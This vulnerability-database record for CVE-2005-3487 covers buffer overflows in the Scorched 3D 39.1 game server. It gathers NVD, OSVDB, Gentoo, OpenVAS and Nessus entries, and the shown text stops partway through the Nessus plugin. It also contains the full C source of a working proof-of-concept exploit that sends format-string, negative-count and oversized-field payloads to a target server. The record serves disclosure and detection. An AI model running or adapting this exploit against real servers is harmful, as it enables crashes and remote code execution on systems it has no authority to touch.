ID: CVE-2005-3487
Type: cve
Reporter: cve@mitre.org
Modified: 2016-10-18T03:35:00
Description
Multiple buffer overflows in Scorched 3D 39.1 (bf) and earlier allow remote attackers to execute arbitrary code via various (1) GLConsole::addLine, (2) ServerCommon::sendString, (3) ServerCommon::serverLog functions, (4) a long command that is not properly handled in ComsMessageHandler.cpp when generating an error message, (5) a long UniqueID value in Logger.cpp, and possibly other unspecified vectors.
{"id": "CVE-2005-3487", "bulletinFamily": "NVD", "title": "CVE-2005-3487", "description": "Multiple buffer overflows in Scorched 3D 39.1 (bf) and earlier allow remote attackers to execute arbitrary code via various (1) GLConsole::addLine, (2) ServerCommon::sendString, (3) ServerCommon::serverLog functions, (4) a long command that is not properly handled in ComsMessageHandler.cpp when generating an error message, (5) a long UniqueID value in Logger.cpp, and possibly other unspecified vectors.", "published": "2005-11-03T22:02:00", "modified": "2016-10-18T03:35:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3487", "reporter": "cve@mitre.org", "references": ["http://www.vupen.com/english/advisories/2005/2288", "http://www.gentoo.org/security/en/glsa/glsa-200511-12.xml", "http://marc.info/?l=full-disclosure&m=113095941031946&w=2", "http://www.osvdb.org/20469", "http://aluigi.altervista.org/adv/scorchbugs-adv.txt", "http://www.osvdb.org/20468", "http://secunia.com/advisories/17423", "http://www.securityfocus.com/bid/15292"], "cvelist": ["CVE-2005-3487"], "type": "cve", "lastseen": "2020-10-03T11:34:56", "edition": 3, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:20469", "OSVDB:20468"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200511-12.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:1285"]}, {"type": "openvas", "idList": ["OPENVAS:55878"]}, {"type": "gentoo", "idList": ["GLSA-200511-12"]}], "modified": "2020-10-03T11:34:56", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2020-10-03T11:34:56", "rev": 2}, "vulnersScore": 7.7}, "cpe": ["cpe:/a:scorched_3d:scorched_3d:39.1"], "affectedSoftware": [{"cpeName": "scorched_3d:scorched_3d", "name": "scorched 3d", "operator": "eq", "version": "39.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", 
"availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:scorched_3d:scorched_3d:39.1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:scorched_3d:scorched_3d:39.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3487"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Scorched 3D. The ComsMessageHandler.cpp component fails to validate command names resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Scorched 3D. The ComsMessageHandler.cpp component fails to validate command names resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.scorched3d.co.uk\n[Secunia Advisory ID:17549](https://secuniaresearch.flexerasoftware.com/advisories/17549/)\n[Secunia Advisory ID:17423](https://secuniaresearch.flexerasoftware.com/advisories/17423/)\n[Related OSVDB ID: 20466](https://vulners.com/osvdb/OSVDB:20466)\n[Related OSVDB ID: 20467](https://vulners.com/osvdb/OSVDB:20467)\n[Related OSVDB ID: 20465](https://vulners.com/osvdb/OSVDB:20465)\n[Related OSVDB ID: 20469](https://vulners.com/osvdb/OSVDB:20469)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-12.xml\nOther Advisory URL: http://aluigi.altervista.org/adv/scorchbugs-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0070.html\nFrSIRT Advisory: ADV-2005-2288\n[CVE-2005-3487](https://vulners.com/cve/CVE-2005-3487)\nBugtraq ID: 15292\n", "modified": "2005-11-02T04:46:16", "published": "2005-11-02T04:46:16", "href": "https://vulners.com/osvdb/OSVDB:20468", "id": "OSVDB:20468", "type": "osvdb", "title": "Scorched 3D ComsMessageHandler.cpp Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, 
{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3487"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Scorched 3D. The Logger.cpp component fails to validate very long values resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Scorched 3D. The Logger.cpp component fails to validate very long values resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.scorched3d.co.uk\n[Secunia Advisory ID:17549](https://secuniaresearch.flexerasoftware.com/advisories/17549/)\n[Secunia Advisory ID:17423](https://secuniaresearch.flexerasoftware.com/advisories/17423/)\n[Related OSVDB ID: 20466](https://vulners.com/osvdb/OSVDB:20466)\n[Related OSVDB ID: 20468](https://vulners.com/osvdb/OSVDB:20468)\n[Related OSVDB ID: 20467](https://vulners.com/osvdb/OSVDB:20467)\n[Related OSVDB ID: 20465](https://vulners.com/osvdb/OSVDB:20465)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-12.xml\nOther Advisory URL: http://aluigi.altervista.org/adv/scorchbugs-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0070.html\nFrSIRT Advisory: ADV-2005-2288\n[CVE-2005-3487](https://vulners.com/cve/CVE-2005-3487)\nBugtraq ID: 15292\n", "modified": "2005-11-02T04:46:16", "published": "2005-11-02T04:46:16", "href": "https://vulners.com/osvdb/OSVDB:20469", "id": "OSVDB:20469", "type": "osvdb", "title": "Scorched 3D Logger.cpp Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": 
"2016-09-06T19:47:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3487", "CVE-2005-3488", "CVE-2005-3486"], "description": "### Background\n\nScorched 3D is a clone of the classic \"Scorched Earth\" DOS game, adding features like a 3D island environment and Internet multiplayer capabilities. \n\n### Description\n\nLuigi Auriemma discovered multiple flaws in the Scorched 3D game server, including a format string vulnerability and several buffer overflows. \n\n### Impact\n\nA remote attacker can exploit these vulnerabilities to crash a game server or execute arbitrary code with the rights of the game server user. Users not running a Scorched 3D game server are not affected by these flaws. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Scorched 3D users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-strategy/scorched3d-40\"", "edition": 1, "modified": "2006-08-10T00:00:00", "published": "2005-11-15T00:00:00", "id": "GLSA-200511-12", "href": "https://security.gentoo.org/glsa/200511-12", "type": "gentoo", "title": "Scorched 3D: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3487", "CVE-2005-3488", "CVE-2005-3486"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-12.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55878", "href": "http://plugins.openvas.org/nasl.php?oid=55878", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200511-12 (scorched3d)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Scorched 3D allow a remote attacker to deny\nservice or execute arbitrary code on game servers.\";\ntag_solution = \"The Scorched 3D package has been hard-masked until a new version correcting\nthese flaws is released. 
In the meantime, current users are advised to\nunmerge the package:\n\n # emerge --unmerge games-strategy/scorched3d\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=111421\nhttp://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-12.\";\n\n \n\nif(description)\n{\n script_id(55878);\n script_cve_id(\"CVE-2005-3486\",\"CVE-2005-3487\",\"CVE-2005-3488\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200511-12 (scorched3d)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"games-strategy/scorched3d\", unaffected: make_list(), vulnerable: make_list(\"le 39.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:56:17", "description": "Scorched 3D <= 39.1 Multiple Vulnerabilities (All-in-One) (PoC). CVE-2005-3486,CVE-2005-3487,CVE-2005-3488. 
Dos exploit for windows platform", "published": "2005-11-02T00:00:00", "type": "exploitdb", "title": "Scorched 3D <= 39.1 - Multiple Vulnerabilities All-in-One PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3487", "CVE-2005-3488", "CVE-2005-3486"], "modified": "2005-11-02T00:00:00", "id": "EDB-ID:1285", "href": "https://www.exploit-db.com/exploits/1285/", "sourceData": "/*\n\nby Luigi Auriemma\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdarg.h>\n#include <time.h>\n#include <zlib.h>\n\n#ifdef WIN32\n #include <winsock.h>\n/*\n Header file used for manage errors in Windows\n It support socket and errno too\n (this header replace the previous sock_errX.h)\n*/\n\n#include <string.h>\n#include <errno.h>\n\n\n\nvoid std_err(void) {\n char *error;\n\n switch(WSAGetLastError()) {\n case 10004: error = \"Interrupted system call\"; break;\n case 10009: error = \"Bad file number\"; break;\n case 10013: error = \"Permission denied\"; break;\n case 10014: error = \"Bad address\"; break;\n case 10022: error = \"Invalid argument (not bind)\"; break;\n case 10024: error = \"Too many open files\"; break;\n case 10035: error = \"Operation would block\"; break;\n case 10036: error = \"Operation now in progress\"; break;\n case 10037: error = \"Operation already in progress\"; break;\n case 10038: error = \"Socket operation on non-socket\"; break;\n case 10039: error = \"Destination address required\"; break;\n case 10040: error = \"Message too long\"; break;\n case 10041: error = \"Protocol wrong type for socket\"; break;\n case 10042: error = \"Bad protocol option\"; break;\n case 10043: error = \"Protocol not supported\"; break;\n case 10044: error = \"Socket type not supported\"; break;\n case 10045: error = \"Operation not supported on socket\"; break;\n case 10046: error = \"Protocol family not supported\"; break;\n case 10047: error = \"Address family not supported by protocol family\"; break;\n case 10048: error = \"Address 
already in use\"; break;\n case 10049: error = \"Can't assign requested address\"; break;\n case 10050: error = \"Network is down\"; break;\n case 10051: error = \"Network is unreachable\"; break;\n case 10052: error = \"Net dropped connection or reset\"; break;\n case 10053: error = \"Software caused connection abort\"; break;\n case 10054: error = \"Connection reset by peer\"; break;\n case 10055: error = \"No buffer space available\"; break;\n case 10056: error = \"Socket is already connected\"; break;\n case 10057: error = \"Socket is not connected\"; break;\n case 10058: error = \"Can't send after socket shutdown\"; break;\n case 10059: error = \"Too many references, can't splice\"; break;\n case 10060: error = \"Connection timed out\"; break;\n case 10061: error = \"Connection refused\"; break;\n case 10062: error = \"Too many levels of symbolic links\"; break;\n case 10063: error = \"File name too long\"; break;\n case 10064: error = \"Host is down\"; break;\n case 10065: error = \"No Route to Host\"; break;\n case 10066: error = \"Directory not empty\"; break;\n case 10067: error = \"Too many processes\"; break;\n case 10068: error = \"Too many users\"; break;\n case 10069: error = \"Disc Quota Exceeded\"; break;\n case 10070: error = \"Stale NFS file handle\"; break;\n case 10091: error = \"Network SubSystem is unavailable\"; break;\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n case 10071: error = \"Too many levels of remote in path\"; break;\n case 11001: error = \"Host not found\"; break;\n case 11002: error = \"Non-Authoritative Host not found\"; break;\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n case 11004: error = \"Valid name, no data record of requested type\"; break;\n default: error = strerror(errno); break;\n }\n fprintf(stderr, \"\\nError: %s\\n\", error);\n exit(1);\n}\n\n// inserted winerr.h /str0ke\n\n 
#define close closesocket\n #define ONESEC 1000\n#else\n #include <unistd.h>\n #include <sys/socket.h>\n #include <sys/types.h>\n #include <arpa/inet.h>\n #include <netinet/in.h>\n #include <netdb.h>\n\n #define ONESEC 1\n#endif\n\n\n\n#define VER \"0.1\"\n#define PORT 27270\n#define BUFFSZ 0xffff\n#define TIMEOUT 5\n#define WAITSEC 5\n#define MAXSOCKS 32\n#define INFO \"status\\0\"\n#define VERTAG \"build \"\n#define BOOMSZ 80000\n#define BOFSZ 2200 // 1024 buffer, we need more for Win compatibility\n\n\n\nu_char *do_it_big(int size);\nvoid scorched3d_info(u_char *data, u_char *version, u_char *pversion);\nvoid read_sock(int sock, u_char *buff, int max);\nint scorched3d_recv(int sd, u_char *pck, int pcksz, u_char *buff, int buffsz);\nvoid scorched3d_send(int sock, u_char *pck, int len, u_char *buff, int buffsz);\nint scorched3d_build_pck(u_char *buff, u_char *cmd, ...);\nint mycpy(u_char *dst, u_char *src);\nint unzip(u_char *in, int size, u_char *out, int maxsz);\nint zip(u_char *in, int size, u_char *out, int maxsz);\nint timeout(int sock);\nu_int resolv(char *host);\nvoid std_err(void);\n\n\n\nint main(int argc, char *argv[]) {\n struct sockaddr_in peer;\n int sd,\n len,\n attack;\n u_short port = PORT;\n u_char numplayers[12],\n password[256],\n version[16],\n pversion[16],\n username[17],\n *connmsg = \"ComsConnectMessage\",\n *uid,\n *buff,\n *pck,\n *msg,\n *p,\n *l;\n\n#ifdef WIN32\n WSADATA wsadata;\n WSAStartup(MAKEWORD(1,0), &wsadata);\n#endif\n\n\n setbuf(stdout, NULL);\n\n fputs(\"\\n\"\n \"Scorched 3D <= 39.1 (bf) multiple vulnerabilities \"VER\"\\n\"\n \"by Luigi Auriemma\\n\"\n \"e-mail: aluigi@autistici.org\\n\"\n \"web: http://aluigi.altervista.org\\n\"\n \"\\n\", stdout);\n\n if(argc < 3) {\n printf(\"\\n\"\n \"Usage: %s <attack> <host> [port(%hu)]\\n\"\n \"\\n\"\n \"Attacks:\\n\"\n \"1 = format string and buffer-overflow in addLine and SendString*\\n\"\n \" (this PoC tests only the format string for simplicity\\n\"\n \"2 = server freeze through 
negative numplayers\\n\"\n \" if server is protected with password you need to know the keyword\\n\"\n \"3 = ComsMessageHandler buffer-overflow\\n\"\n \"4 = various crashes and possible code execution in Logger.cpp\\n\"\n \" if server is protected with password you need to know the keyword\\n\"\n \"\\n\", argv[0], port);\n exit(1);\n }\n\n attack = atoi(argv[1]);\n if(argc > 3) port = atoi(argv[3]);\n\n peer.sin_addr.s_addr = resolv(argv[2]);\n peer.sin_port = htons(port + 1);\n peer.sin_family = AF_INET;\n\n printf(\"- target %s : %hu\\n\",\n inet_ntoa(peer.sin_addr), port);\n\n buff = malloc(BUFFSZ + 1);\n pck = malloc(BUFFSZ + 1);\n if(!buff || !pck) std_err();\n\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd < 0) std_err();\n sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));\n if(!timeout(sd)) {\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\n if(len < 0) std_err();\n buff[len] = 0;\n scorched3d_info(buff, version, pversion);\n printf(\"- set version %s (%s)\\n\", version, pversion);\n } else {\n strcpy(version, \"39.1\");\n strcpy(pversion, \"bf\");\n }\n close(sd);\n\n fputs(\n \"- if you lost the connection probably the server is vulnerable\\n\"\n \"- start attack:\\n\", stdout);\n\n uid = \"\";\n strcpy(numplayers, \"1\");\n password[0] = 0;\n\n switch(attack) {\n case 1: connmsg = \"%n%n%n%n%n\"; break;\n case 2: strcpy(numplayers, \"-1\"); break;\n case 3: connmsg = do_it_big(BOFSZ); break;\n case 4: uid = do_it_big(BOOMSZ); break;\n default: {\n printf(\"\\nError: the attack %d is not available\\n\\n\", attack);\n exit(1);\n } break;\n }\n\n peer.sin_port = htons(port);\n for(;;) { // password handling\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n if(sd < 0) std_err();\n if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\n < 0) std_err();\n\n sprintf(username, \"%lx\", time(NULL));\n\n len = scorched3d_build_pck(pck,\n connmsg,\n \"host\", \"Linux\",\n \"numplayers\", numplayers,\n \"password\", 
password,\n \"pversion\", pversion,\n \"uid\", uid,\n \"username\", username,\n \"version\", version,\n NULL);\n\n scorched3d_send(sd, pck, len, buff, BUFFSZ);\n\n if(timeout(sd) < 0) {\n fputs(\"\\nError: socket timeout, the server has not replied to our request\\n\", stdout);\n exit(1);\n }\n\n len = scorched3d_recv(sd, pck, BUFFSZ, buff, BUFFSZ);\n\n if(!strcmp(buff, \"ComsTextMessage\")) {\n msg = buff + 16;\n\n if(strstr(msg, \"password\")) {\n fputs(\"- server protected, insert the right password:\\n \", stdout);\n fflush(stdin);\n fgets(password, sizeof(password), stdin);\n for(p = password; *p > '\\r'; p++);\n *p = 0;\n close(sd);\n continue;\n\n } else if(strstr(msg, \"version\")) {\n p = strstr(msg, VERTAG);\n if(!p) {\n printf(\"\\nError: no version found in the message:\\n%s\\n\", msg);\n exit(1);\n }\n p += sizeof(VERTAG) - 1;\n\n l = strchr(p, '(');\n if(l) *(l - 1) = 0;\n strcpy(version, p);\n\n p = l + 1;\n l = strchr(p, ')');\n if(l) *l = 0;\n strcpy(pversion, p);\n\n printf(\"- set version %s (%s)\\n\", version, pversion);\n close(sd);\n continue;\n }\n\n printf(\"%s\\n\", buff + 16);\n exit(1);\n }\n\n close(sd);\n break;\n }\n return(0);\n}\n\n\n\nu_char *do_it_big(int size) {\n u_char *s;\n\n s = malloc(size + 1);\n if(!s) std_err();\n memset(s, 'a', size);\n s[size] = 0;\n return(s);\n}\n\n\n\nvoid scorched3d_info(u_char *data, u_char *version, u_char *pversion) {\n u_char *p,\n *par,\n *val;\n\n version[0] = 0;\n pversion[0] = 0;\n\n p = strchr(data, ' ');\n if(!p) return;\n\n for(;;) {\n data = p + 1;\n if((*data == '/') || (*data == '>')) break;\n\n p = strchr(data, '=');\n if(!p) break;\n *p = 0;\n par = data;\n data = p + 1;\n if(*data == '\\'') {\n data++;\n p = strchr(data, '\\'');\n if(p) *p = 0;\n }\n p = strchr(p + 1, ' ');\n if(p) *p = 0;\n val = data;\n\n printf(\"%20s: %s\\n\", par, val);\n\n // strcpy usage, not sanitized\n if(!strcmp(par, \"version\")) {\n strcpy(version, val);\n } else if(!strcmp(par, \"protocolversion\")) {\n 
strcpy(pversion, val);\n }\n }\n}\n\n\n\nvoid read_sock(int sd, u_char *buff, int max) {\n int t;\n\n while(max) {\n t = recv(sd, buff, max, 0);\n if(t <= 0) std_err();\n max -= t;\n }\n}\n\n\n\nint scorched3d_recv(int sd, u_char *pck, int pcksz, u_char *buff, int buffsz) {\n int len,\n unzlen;\n\n read_sock(sd, (u_char *)&len, 4);\n len = ntohl(len);\n\n read_sock(sd, (u_char *)&unzlen, 4);\n unzlen = ntohl(unzlen);\n\n read_sock(sd, pck, len - 4);\n\n if(unzlen > buffsz) return(0);\n len = unzip(pck, pcksz, buff, unzlen);\n return(len);\n}\n\n\n\nvoid scorched3d_send(int sd, u_char *pck, int len, u_char *buff, int buffsz) {\n int tmp,\n zlen;\n\n zlen = zip(pck, len, buff, buffsz);\n\n tmp = htonl(zlen + 4);\n if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();\n\n tmp = htonl(len);\n if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();\n\n if(send(sd, buff, zlen, 0) < 0) std_err();\n}\n\n\n\nint scorched3d_build_pck(u_char *buff, u_char *cmd, ...) {\n va_list ap;\n int num = 0,\n *pnum;\n u_char *p,\n *s;\n\n p = buff;\n p += mycpy(p, cmd);\n pnum = (int *)p;\n p += 4;\n\n va_start(ap, cmd);\n while((s = va_arg(ap, u_char *))) {\n p += mycpy(p, s);\n num++;\n }\n va_end(ap);\n\n *pnum = htonl(num >> 1);\n return(p - buff);\n}\n\n\n\nint mycpy(u_char *dst, u_char *src) {\n u_char *base = dst;\n\n while(*src) *dst++ = *src++;\n *dst++ = 0;\n return(dst - base);\n}\n\n\n\nint unzip(u_char *in, int size, u_char *out, int maxsz) {\n z_stream z;\n int ret;\n\n z.zalloc = (alloc_func)0;\n z.zfree = (free_func)0;\n z.opaque = (voidpf)0;\n\n if(inflateInit2(&z, 15)) {\n fputs(\"\\nError: zlib initialization error\\n\", stdout);\n exit(1);\n }\n\n z.next_in = in;\n z.avail_in = size;\n z.next_out = out;\n z.avail_out = maxsz;\n inflate(&z, Z_NO_FLUSH);\n\n ret = z.total_out;\n inflateEnd(&z);\n return(ret);\n}\n\n\n\nint zip(u_char *in, int size, u_char *out, int maxsz) {\n z_stream z;\n int ret;\n\n z.zalloc = (alloc_func)0;\n z.zfree = (free_func)0;\n z.opaque = (voidpf)0;\n\n 
if(deflateInit2(&z, Z_BEST_COMPRESSION, Z_DEFLATED, 15, 9, Z_DEFAULT_STRATEGY)) {\n fputs(\"\\nError: zlib initialization error\\n\", stdout);\n exit(1);\n }\n\n z.next_in = in;\n z.avail_in = size;\n z.next_out = out;\n z.avail_out = maxsz;\n deflate(&z, Z_FINISH);\n\n ret = z.total_out;\n deflateEnd(&z);\n return(ret);\n}\n\n\n\nint timeout(int sock) {\n struct timeval tout;\n fd_set fd_read;\n int err;\n\n tout.tv_sec = TIMEOUT;\n tout.tv_usec = 0;\n FD_ZERO(&fd_read);\n FD_SET(sock, &fd_read);\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\n if(err < 0) std_err();\n if(!err) return(-1);\n return(0);\n}\n\n\n\nu_int resolv(char *host) {\n struct hostent *hp;\n u_int host_ip;\n\n host_ip = inet_addr(host);\n if(host_ip == INADDR_NONE) {\n hp = gethostbyname(host);\n if(!hp) {\n printf(\"\\nError: Unable to resolve hostname (%s)\\n\", host);\n exit(1);\n } else host_ip = *(u_int *)(hp->h_addr);\n }\n return(host_ip);\n}\n\n\n\n#ifndef WIN32\n void std_err(void) {\n perror(\"\\nError\");\n exit(1);\n }\n#endif\n\n// milw0rm.com [2005-11-02]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1285/"}], "nessus": [{"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200511-12\n(Scorched 3D: Multiple vulnerabilities)\n\n Luigi Auriemma discovered multiple flaws in the Scorched 3D game\n server, including a format string vulnerability and several buffer\n overflows.\n \nImpact :\n\n A remote attacker can exploit these vulnerabilities to crash a game\n server or execute arbitrary code with the rights of the game server\n user. 
Users not running a Scorched 3D game server are not affected by\n these flaws.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2005-11-21T00:00:00", "title": "GLSA-200511-12 : Scorched 3D: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3487", "CVE-2005-3488", "CVE-2005-3486"], "modified": "2005-11-21T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:scorched3d", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200511-12.NASL", "href": "https://www.tenable.com/plugins/nessus/20233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-12.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20233);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3486\", \"CVE-2005-3487\", \"CVE-2005-3488\");\n script_xref(name:\"GLSA\", value:\"200511-12\");\n\n script_name(english:\"GLSA-200511-12 : Scorched 3D: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-12\n(Scorched 3D: Multiple vulnerabilities)\n\n Luigi Auriemma discovered multiple flaws in the Scorched 3D game\n server, including a format string vulnerability and several buffer\n overflows.\n \nImpact :\n\n 
A remote attacker can exploit these vulnerabilities to crash a game\n server or execute arbitrary code with the rights of the game server\n user. Users not running a Scorched 3D game server are not affected by\n these flaws.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Scorched 3D users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-strategy/scorched3d-40'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:scorched3d\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. 
